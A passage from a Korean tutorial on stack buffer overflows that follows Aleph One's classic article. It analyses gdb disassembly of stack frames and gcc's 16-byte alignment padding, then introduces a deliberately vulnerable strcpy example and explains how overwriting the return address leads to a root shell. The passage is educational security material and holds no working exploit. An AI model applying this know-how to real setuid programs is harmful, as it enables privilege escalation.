예를들어, 기준이되는주소 a 가 100 이고, 새로운주소 b 의값이 150 이라고하자. 그러면오프셋 은 50 이될것이다. 오프셋을이용하여주소를나타내는것을상대주소지정방식이라고한다. 19

21 종료될때원래의상태로돌아가기위해스택이비워진다. 이때의과정을보통 procedure epilog라고부른다. 이에대한자세한내용은뒤에서곧알아볼것이다. 먼저원문에나오는내용으로설명을하고, 그다음으로필자의시스템에서의결과를제시하며다시설명하는방법을취하겠다. 다음소스코드를보자 example1.c void function(int a, int b, int c){ char buffer1[5]; char buffer2[10]; void main(){ function(1,2,3); 위의소스에서 function() 이라는함수를호출하기위해프로그램은어떤과정을거치는지 알아보기위해 -S 스위치를주고컴파일하면어셈블리어코드를추출할수있다. 참고로 Gnu C 컴파일러의컴파일과정은다음과같다. 소스코드의이름을 prog.c 라고하자. Source code Translation Unit Assembly Object Executable File prog.c prog.i prog.s prog.o a.out(prog) 위의소스를다음과같이컴파일한다. $ gcc S o example1.s example1.c example1.s 의결과는보면다음과같은부분이나온다. pushl $3 pushl $2 pushl $1 call function 20

22 이것을보면 3개의아규먼트를스택안으로함수에대해 push하는데, 그순서가역순으로되어있다. 그런다음함수를호출하고있다. 혹시라도기초가부족한독자들을위해아규먼트와파라미터를다시설명한다. 위의소스에서 void function(int a, int b, int c) 부분에는 a, b, c는파라미터이고, 이파라미터에직접대입될값이정의되어있는 function(1, 2,3) 에서 1, 2, 3이 아규먼트이다. call function 부분에서 call 이라는명령은스택에 IP(instruction pointer) 를 push 한다. 이때스택에저장된 IP 를리턴어드레스 (RET, return address) 라고부를것이다. 함수호출이있은후처음으로이루어지는것은앞에서잠시이야기했던 procedure prolog 이다. 다음을보자. push mov sub %ebp %esp,%ebp $20,%esp 먼저프레임포인터로사용되는 ebp를스택에 push한다 (push %ebp). 왜프레임포인터를사용하는지에대해서는앞에서도이미언급했지만, 고정된위치를가지는프레임포인터가지역변수와파라미터등을참조하기에유용하기때문이다. 그런다음현재 sp를 ebp 위로복사하고, 복사된 sp를새로운프레임포인터로만든다 (mov %esp,%ebp). 앞으로도복사되어새로운프레임포인터가된것을 저장된 FP (SFP, Saved Frame Pointer) 라고부를것이다. 그런다음 SP로부터크기를빼지역변수를위한공간을할당한다 (sub $20,%esp). 이것은어떤함수를처리하기위해그함수내에서사용되는지역변수가들어갈공간이필요하기때문이다. 이상과같이 procedure prolog라고불리는과정을알아보았다. 그런데 procedure prolog에서지역변수를위해 20 바이트를할당하고있는데, 이것은메모리가 word 단위로정렬되기때문이다. 1 word는 4 바이트 (32 비트 ) 크기이며, 그래서 buffer1[5] 은실제 8 바이트, buffer2[10] 는 12 바이트의메모리를차지하게된다. 따라서 20 바이트를 SP에서빼게된다. 간단히표를통해알아보자. [ buffer1 ] 1 word buffer1[0] buffer1[1] buffer1[2] buffer1[3] 2 word buffer1[4] char 형은데이트는 1 바이트의메모리를차지한다는것은잘알고있을것이다. buffer1 에 5 21

23 바이트가할당되므로 2개의 word를사용해야한다. 2개의 word에서실제사용되는 5바이트이외의나머지 3바이트는데이터처리와상관없이메모리낭비가되는것이다. 결국 buffer1은 2개의 word를사용하므로 8바이트의메모리가할당되었다. 참고로위의표에서왜 buffer1[0] 으로시작되는지이해가되지않는사람은이글을읽을자격이없다. [ buffer2 ] 1 word buffer2[0] buffer2[1] buffer2[2] buffer2[3] 2 word buffer2[4] buffer2[5] buffer2[6] buffer2[7] 3 word buffer2[8] buffer2[9] 10바이트를실제사용하게되는 buffer2[10] 의경우 3개의 word가사용되어야한다. 결국 12바이트의메모리가할당되는것이다. 앞에서언급한것을염두에두고 function() 이라는함수가호출될때스택의모양을살펴보면다음과같다. 낮은 메모리주소 buffer2 buffer1 SFP ret a b c [12 byte] [8 byte] [4 byte] [4 byte] [4 byte] [4 byte] [4 byte] 높은메모리주소 스택의꼭대기 스택의 바닥 위의표에서화살표가 쪽으로나와있는데, 스택의꼭대기로데이터가쌓이고, 대신메모리주소는낮아지는것이다. 앞에서도잠시언급했듯이프레임포인터 (SFP) 를기준으로보면지역변수의오프셋은음수이고, 파라미터들은양수임을알수있다. 이것은스택이아래로자라기때문이다. 초등학교수학시간에배운것을생각해보자. 기준점이되는 SFP가 0이고, 좌측에있는지역변수는음수의오프셋을가지게되고, 우측에있는파라미터들은양수의오프셋을가지게될것이다. 유치할지도모르는비유를하나하자. 나무가한그루자란다. 줄기는위로자라고, 뿌리는아래로자란다. 메모리의입장에서는줄기쪽으로커가고, 22

24 스택은뿌리쪽으로커간다. 정상적인우리인간의사고로보면줄기쪽으로생각한다. 그러나스택을이야기할때는거꾸로생각하자. 이제앞에서살펴보았던내용을현재우리가주로사용하고있는시스템에서의결과를알아보도록하겠다. 필자가테스트용으로사용하고있는시스템은 Red Hat 8.0버전이다. 그리고먼저언급해야할것은 gcc 버전에따른결과값이다르다는것이다. Aleph One의글에서사용된 gcc 버전은 2.96 이하버전이다. 바로앞에서도살펴보았지만지역변수를위해할당하는공간의크기를우리는쉽게이해할수있었다. 그러나보안상의이유인지모르겠으나 gcc 2.96 이후버전부터는결과값을분석하기가그만큼어려워졌다. 하지만포기하면해커의자질이없는것이다. 뭔가실마리를찾아야한다. 그래서 gcc 버전별차이가어떤지확인을해볼것이다. 먼저다음은필자의시스템에서나온결과이다. test]$ uname -a Linux localhost.localdomain #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux [vangelis@localhost test]$ gcc -v gcc version (Red Hat Linux ) [vangelis@localhost test]$ vi example1.c /* example1.c by Aleph One */ void function(int a, int b, int c){ char buffer1[5]; char buffer2[10]; void main(){ function(1,2,3); ~ ~ [vangelis@localhost test]$ gcc -o ex ex.c ex.c: In function `main': ex.c:6: warning: return type of `main' is not `int' 23

25 test]$ gdb ex GNU gdb Red Hat Linux ( ) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... disas main Dump of assembler code for function main: 0x80482fc <main>: push %ebp 0x80482fd <main+1>: mov %esp,%ebp 0x80482ff <main+3>: sub $0x8,%esp 0x <main+6>: and $0xfffffff0,%esp 0x <main+9>: mov $0x0,%eax 0x804830a <main+14>: sub %eax,%esp 0x804830c <main+16>: sub $0x4,%esp 0x804830f <main+19>: push $0x3 0x <main+21>: push $0x2 0x <main+23>: push $0x1 0x <main+25>: call 0x80482f4 <function> 0x804831a <main+30>: add $0x10,%esp 0x804831d <main+33>: 0x804831e <main+34>: 0x804831f <main+35>: leave ret nop End of assembler dump. disas function Dump of assembler code for function function: 0x80482f4 <function>: push %ebp 0x80482f5 <function+1>: mov 0x80482f7 <function+3>: sub %esp,%ebp $0x28,%esp 24

26 0x80482fa <function+6>: leave 0x80482fb <function+7>: ret End of assembler dump. q [vangelis@localhost test]$ gdb를사용하여추출한 function 함수부분을보면다음과같은결과가나왔다. 0x80482f4 <function>: push %ebp 0x80482f5 <function+1>: mov %esp,%ebp 0x80482f7 <function+3>: sub $0x28,%esp 그런데 -S 스위치를사용하여추출한아래의경우는다음과같은결과가나왔다. function: pushl movl subl %ebp %esp, %ebp $40, %esp 둘을비교해보면뭔가차이점을볼수있는데, gdb를이용했을때는 16진수로값 ($0x28) 으로표시되어있고, -S 스위치를사용하여추출한어셈블리어코드에는십진수 ($40) 로되어있다는것을알수있다. 이상할것없다 16진수 0x28은십진수 40이기때문이다. 단지표현하는방식이다를뿐이다. 그리고다른차이점은 gdb를이용했을때는 push 라고되어있지만아래의어셈블리어코드에서는 pushl 로표현되어있다. 이역시표현의차이이지같은명령어이므로초보자들은헷갈리지않도록하자. 아래는 -S 스위치를사용하여추출한어셈블리어코드이다. [vangelis@localhost test]$ gcc -S -o ex.s ex.c ex.c: In function `main': ex.c:6: warning: return type of `main' is not `int' [vangelis@localhost test]$ cat ex.s.file "ex.c".text.align 2.globl function 25

27 function:.type pushl movl subl %ebp %esp, %ebp $40, %esp leave ret.lfe1:.size function,.lfe1-function.globl main.align 2.type main: pushl movl subl andl movl subl subl %ebp %esp, %ebp $8, %esp $-16, %esp $0, %eax %eax, %esp $4, %esp pushl $3 pushl $2 pushl $1 call addl function $16, %esp leave ret.lfe2:.size main,.lfe2-main.ident "GCC: (GNU) (Red Hat Linux )" test]$ 26

28 위의결과를보면 Aleph One 의테스트결과와필자의시스템에서나온결과는다르다. 표를 통해알아보도록하자. 구분소스결과차이점 Aleph One (gcc 2.96 이전 ) void function(int a, int b, int c) { char buffer1[5]; push mov sub %ebp %esp,%ebp $20,%esp char buffer2[10]; 지역변수를위한 메모리할당량이 필자의시스템 void main(){ function(1,2,3); push mov %ebp %esp,%ebp 달라짐 (gcc 2.96 이후 ) sub $40,%esp 아마도초보자들이느끼는가장큰어려움중의하나가시스템의차이때문에참고하는문서의테스트결과와자신의테스트결과가다르게나와혼란을겪는것일것이다. 그러면왜이런차이가날까? 이제 gcc 2.96버전이전과이후의차이점에대해서간단히알아보도록하자. gcc 2.96 버전이채택된것은 Red Hat 7.0부터이다. 7.0 버전에설치된 gcc 2.96버전에버그가있어 Red Hat Linux i386에서수정된 gcc 2.96버전이설치되었다. 그러나 2.96과 2.97 버전은공식 릴리즈가아니라개발버전이라는것을염두에두자. 14 필자가이글을위해사용하고있는 Red Hat 8.0 에서는 3.2 버전이사용되고있다. 그러면우선다음테스트결과를보자. [vangelis@localhost gdb]$ vi e1.c void function(int a, int b, int c){ char buffer1[5];

29 char buffer2[10]; void main(){ function(1,2,3); ~ ~ [vangelis@localhost gdb]$ gcc -o e1 e1.c e1.c: In function `main': e1.c:6: warning: return type of `main' is not `int' [vangelis@localhost gdb]$ gdb e1 GNU gdb Red Hat Linux ( ) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... disas main Dump of assembler code for function main: 0x80482fc <main>: push %ebp 0x80482fd <main+1>: mov %esp,%ebp 0x80482ff <main+3>: sub $0x8,%esp 0x <main+6>: and $0xfffffff0,%esp 0x <main+9>: mov $0x0,%eax 0x804830a <main+14>: sub %eax,%esp 0x804830c <main+16>: sub $0x4,%esp 0x804830f <main+19>: push $0x3 0x <main+21>: push $0x2 0x <main+23>: push $0x1 0x <main+25>: call 0x80482f4 <function> 0x804831a <main+30>: add $0x10,%esp 0x804831d <main+33>: leave 0x804831e <main+34>: ret 0x804831f <main+35>: nop End of assembler dump. disas function Dump of assembler code for function function: 0x80482f4 <function>: push %ebp 0x80482f5 <function+1>: mov %esp,%ebp 0x80482f7 <function+3>: sub $0x28,%esp 0x80482fa <function+6>: leave 0x80482fb <function+7>: ret End of assembler dump. 28

30 q gdb]$ vi e2.c void function(int a, int b, int c){ char buffer1[1]; char buffer2[12]; void main(){ function(1,2,3); disas function Dump of assembler code for function function: 0x80482f4 <function>: push %ebp 0x80482f5 <function+1>: mov %esp,%ebp 0x80482f7 <function+3>: sub $0x28,%esp 0x80482fa <function+6>: leave 0x80482fb <function+7>: ret End of assembler dump gdb]$ vi e3.c void function(int a, int b, int c){ char buffer1[16]; char buffer2[16]; void main(){ function(1,2,3); ~ disas function Dump of assembler code for function function: 0x80482f4 <function>: push %ebp 0x80482f5 <function+1>: mov %esp,%ebp 0x80482f7 <function+3>: sub $0x28,%esp 0x80482fa <function+6>: leave 29

31 0x80482fb <function+7>: ret End of assembler dump gdb]$ vi e4.c void function(int a, int b, int c){ char buffer1[17]; char buffer2[16]; void main(){ function(1,2,3); ~ disas function Dump of assembler code for function function: 0x80482f4 <function>: push %ebp 0x80482f5 <function+1>: mov %esp,%ebp 0x80482f7 <function+3>: sub $0x38,%esp 0x80482fa <function+6>: leave 0x80482fb <function+7>: ret End of assembler dump [vangelis@localhost gdb]$ vi e5.c void function(int a, int b, int c){ char buffer1[17]; char buffer2[17]; void main(){ function(1,2,3); ~ disas function Dump of assembler code for function function: 0x80482f4 <function>: push %ebp 30

32 0x80482f5 <function+1>: mov 0x80482f7 <function+3>: sub 0x80482fa <function+6>: leave 0x80482fb <function+7>: ret End of assembler dump. %esp,%ebp $0x48,%esp gdb]$ vi e6.c void function(int a, int b, int c){ char buffer1[33]; char buffer2[25]; void main(){ function(1,2,3); ~ disas function Dump of assembler code for function function: 0x80482f4 <function>: push %ebp 0x80482f5 <function+1>: mov %esp,%ebp 0x80482f7 <function+3>: sub $0x58,%esp 0x80482fa <function+6>: leave 0x80482fb <function+7>: ret End of assembler dump [vangelis@localhost gdb]$ vi e7.c void function(int a, int b, int c){ char buffer1[49]; char buffer2[25]; void main(){ function(1,2,3); ~ disas function Dump of assembler code for function function: 31

33 0x80482f4 <function>: push %ebp 0x80482f5 <function+1>: mov %esp,%ebp 0x80482f7 <function+3>: sub $0x68,%esp 0x80482fa <function+6>: leave 0x80482fb <function+7>: ret End of assembler dump 결과를살펴보면조금복잡해보이지만뭔가규칙성이보인다. 그규칙성만찾아내면우리의 공부가한층쉬워질수있을것이다. 이제그규칙성을찾아내기위해다음과같은간단한 소스를이용해보자 void main() { char buffer[1]; char buffer[1] 부분은그데이터의양을 4 바이트씩증가시키면서테스트를할것이다. 이렇게하는이유는 word 단위로데이터가메모리에들어가기때문이다. 아래의테스트에서실행파일의이름은데이터의양과일치한다는것을참고로이야기한다. 그리고각각의소스는생략한다. [vangelis@localhost gdb]$ vi 1.c void main() { char buffer[1]; ~ ~ [vangelis@localhost gdb]$ gcc -o 1 1.c [vangelis@localhost gdb]$ gdb 1 GNU gdb Red Hat Linux ( ) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are 32

34 welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x8,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 4 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x8,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. [vangelis@localhost gdb]$ gdb 5 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x18,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 33

35 0x <main+17>: 0x <main+18>: 0x <main+19>: End of assembler dump. ret nop nop gdb]$ gdb 8 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x18,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. [vangelis@localhost gdb]$ gdb 12 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x18,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. [vangelis@localhost gdb]$ gdb 16 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x18,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 34

36 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 17 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x28,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 20 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x28,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 24 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x28,%esp 35

37 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 28 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x28,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 32 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x28,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 33 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 36

38 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x38,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. -- 중략 -- gdb]$ gdb 48 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x38,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 49 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x48,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. 37

39 gdb]$ gdb 64 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x48,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 65 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x58,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 80 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x58,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 38

40 0x <main+19>: nop End of assembler dump. gdb]$ gdb 81 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x68,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 96 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x68,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 97 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x78,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 39

41 0x <main+19>: End of assembler dump. nop gdb]$ gdb 112 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x78,%esp 0x80482fa <main+6>: and $0xfffffff0,%esp 0x80482fd <main+9>: mov $0x0,%eax 0x <main+14>: sub %eax,%esp 0x <main+16>: leave 0x <main+17>: ret 0x <main+18>: nop 0x <main+19>: nop End of assembler dump. gdb]$ gdb 113 disas main Dump of assembler code for function main: 0x80482f4 <main>: push %ebp 0x80482f5 <main+1>: mov %esp,%ebp 0x80482f7 <main+3>: sub $0x88,%esp 0x80482fd <main+9>: and $0xfffffff0,%esp 0x <main+12>: mov $0x0,%eax 0x <main+17>: sub %eax,%esp 0x <main+19>: leave 0x <main+20>: ret 0x <main+21>: nop 0x804830a <main+22>: nop 0x804830b <main+23>: nop End of assembler dump. q [vangelis@localhost gdb]$ 편의를위해위의결과를표로작성해보자. 40

42 데이터량 메모리할당값 데이터량 메모리할당값 (buffer의크기 ) 16진수 10진수 (buffer의크기 ) 16진수 10진수 1 0x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x28 40 위를보면 1 부터 16 까지 8 바이트와 24 바이트가불규칙하게분포되어있지만, 대부분 24 바이트가할당되어있다. 그리고초록색음영이들어가있는부분을보면한가지공통점이 41

43 있다. 드디어우리가어려워했던부분이해결됨셈이다. 위의표를보고정리를하면다음과같다. 어떤함수가호출될때지역변수를위해공간을할당하는방식은데이트의양과상관없이 16 바이트를다채운다는것이다. 즉, 예를들어지역변수 buffer[5] 에게는 gcc 2.96 이전버전에서는 word 단위로메모리에데이터가적재되기때문에 8 바이트가할당되지만, 2.96 버전이후의경우 16 바이트가할당된다는것이다. 그래서 buffer[17] 의경우 2.96 이전버전에서는 20 바이트가할당되지만이후버전에서는 32 바이트가할당된다. 오버플로우공격시이점을염두에두고덮어쓰기를해야한다. 다시 Aleph One의 example1.c의경우에대해마지막으로간단히설명해보자. 앞에서정리했던표를다시보자. 구분소스결과차이점 Aleph One (gcc 2.96 이전 ) void function(int a, int b, int c) { char buffer1[5]; push mov sub %ebp %esp,%ebp $20,%esp char buffer2[10]; 지역변수를위한 메모리할당량이 필자의시스템 void main(){ function(1,2,3); push mov %ebp %esp,%ebp 달라짐 (gcc 2.96 이후 ) sub $40,%esp 위의표를보면 gcc 2.96 이전버전을보면 20 바이트가할당되어있는데, 이것은앞에서설명한 것처럼다음과같다. char buffer1[5](8 바이트 ) + char buffer2[10](12 바이트 ) = 20 바이트 42

44 그런데 gcc 2.96 이후버전을보면 40 바이트가할당되어있으며, 이것은다음과같이설명할수 있다. char buffer1[5](16 바이트 ) + char buffer2[10](16 바이트 ) + dummy(8 바이트 ) = 40 바이트 위의내용을보면, char buffer1[5] 의경우데이터값이 5이므로 16 바이트이하이다. 그래서 16 바이트전체가할당되고, char buffer2[10] 의경우역시데이터값이 10이므로 16 바이트이하이다. 그래서 16 바이트가할당된다. 이것만계산하면 32 바이트가되겠지만테스트결과는 40 바이트였다. 이것은 dummy값 8 바이트가할당되기때문이다. 그래서우리가앞에서살펴보았던원문에나오는표는다음과같이수정해야한다. buffer2 buffer1 dummy SFP ret a b c 16 byte 16 byte 8 byte 4 byte 4 byte 4 byte 4 byte 4 byte 여기서 dummy값 8 바이트가왜생겼는지에대해간단히알아보자. 위의표를보면 buffer2와 buffer1에도각각 16 바이트가할당되어있다. gcc 2.96 이전버전의경우 12 바이트와 8 바이트가할당되어야하지만, gcc 2.96 이후버전에서는스택의정렬 (alignment) 을 16 바이트씩유지한다는원칙에의해각각 16 바이트씩할당된것이다. 그런데위의표에서 ret에서 buffer1까지의거리가 dummy값을제외한다면 8 바이트밖에안된다. 그러면스택의기본정렬규칙이깨지게되므로스택정렬원칙을유지하기위해 buffer1과 sfp 사이에 dummy값 8 바이트가들어간것이다. 이제지루한기초지식을다알아본셈이다. 지금부터본격적으로버퍼오버플로우공격에대해알아보자. Buffer Overflows 버퍼오버플로우는버퍼안에다룰수있는것보다더많은데이터를집어넣고자할때발생하는결과이다. 이것은프로그래머의잘못된코딩에기인하고, 이취약점을공격자로하여금공격자가원하는코드를실행할수있게해준다. 버퍼가수용할수있는것보다더많은데이터를넣을수있는상황은바운드체킹을하지않는 strcpy() 와같은함수를사용할 43

45 때대부분발생한다. 예를들면, 버퍼가수용할수있는데이터의양을 50으로설정해두었고, 버퍼에데이터를넣어주는함수를 strcpy() 를사용한다면, strcpy() 함수의경우바운드체킹을하지않는함수이기때문에버퍼에데이터를입력할때지정된데이터의양보다더많은데이터를입력하는것이가능하고, 그결과리턴어드레스도조작할수있게된다. 이때쉘을실행하는쉘코드를같이입력하고, 조작된리턴어드레스가쉘코드를가리키도록한다면함수가자신의일을마치고리턴할때쉘을실행하게될것이고, 만약취약한프로그램이 setuid 0으로설정되어있다면루트쉘을실행하게될것이다. 앞에서리턴어드레스가어떻게조작될수있는지에대해서이미알아보았다. 이제부터본격적인버퍼오버플로우기법에대해알아보도록한다. 물론 Aleph One의글에한정지어서할것이다. 그이유는수많은기법들이발표되었기때문에그기법들을모두알아보기위해서는별도의글이필요할것이다. 다음소스를보자 example2.c void function(char *str){ char buffer[16]; strcpy(buffer, str); void main(){ char large_string[256]; int; for(i=0; i<255; i++) large_string[i]= A ; function(large_string); 위의소스를언뜻살펴보아도버퍼오버플로우취약점을가지고있다는것을알수있다. 위와 44

46 같이코딩을할프로그래머는없을것이다. 어디까지나오버플로우공부를위해제시한프로그램일뿐이다. 그래서오버플로우취약점을가진프로그램을분석해서취약점을찾아내고, 그프로그램을공략하기까지는많은열정이필요할것이다. 위의프로그램은독자들도잘알고있듯이 strcpy() 함수를사용하여바운드체킹을하지않아오버플로우문제가생긴다. 만약 strncpy() 15 함수를사용한다면바운드체킹을하게되어오버플로우문제는발생하지않을 것이다. 다음간단한예를보자 #include <stdio.h> #include <string.h> int main () { char buf1[]= "wowhacker"; char buf2[6]; strncpy (buf2,buf1,5); /* 복사되어야할문자가 5로설정되어있음 */ buf2[5]=' 0'; puts (buf2); return 0; 위의프로그램을실행하면결과는 wowha 로나올것이다. 버퍼에들어갈데이터의양을지정해두었기때문에오버플로우의위험이없다. 다시 Aleph One의소스로돌아가면, 이프로그램을실행하게되면세그멘테이션오류를일으키게될것이다. 함수를호출하게될때스택의모양은대략다음과같을것이다. 물론요즘환경에서는더미값이 buffer와 sfp사이에들어갈것이다. 이것은앞에서살펴본바다. 15 strncpy() 함수의시놉시스는다음과같다. char * strncpy ( char * dest, const char * src, sizet_t num ); 45

